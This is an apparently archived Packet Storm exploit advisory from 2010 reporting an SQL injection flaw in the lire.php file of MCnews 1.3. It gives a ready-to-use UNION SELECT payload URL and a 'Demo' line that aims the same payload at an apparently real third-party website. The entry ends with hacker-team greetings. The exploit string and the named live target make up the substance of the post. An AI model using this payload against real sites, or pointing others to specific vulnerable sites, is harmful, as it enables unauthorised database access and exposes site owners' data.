MCnews 1.3 SQL Injection

2010-01-24T00:00:00
ID PACKETSTORM:85566
Type packetstorm
Reporter s4r4d0
Modified 2010-01-24T00:00:00

Description

                                        
                                            `  
[::] MCnews 1.3  
[::] Download:  
http://www.phpforums.net/mcNews1.3.zip (link off)  
[::] Vendor: www.phpforums.net  
[::] Author:  
s4r4d0  
[::] mail: s4r4d0@yahoo.com  
[::] Bug: Sql Injection found on lire.php file  
[::] Exploit: http://host/mcNews/lire.php?n=-1+UNION+SELECT+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--  
[::] Demo: http://www.fielbicolor.net/mcNews/lire.php?n=-1+UNION+SELECT+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--  
[::] Greetz : Elemento_pcx - Vympel - sp3x - and Special to M0nt3r   
[::] Made in Brazil  
[::] Team: Fatal Error   
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`